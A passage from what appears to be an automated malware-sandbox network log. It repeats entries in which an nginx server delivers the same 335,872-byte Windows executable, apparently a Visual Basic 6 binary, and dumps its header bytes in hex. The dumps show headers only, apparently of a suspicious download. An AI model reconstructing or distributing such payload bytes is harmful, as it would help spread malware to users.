11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:39 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:40 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:46 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:46 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:48 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:54 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:55 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 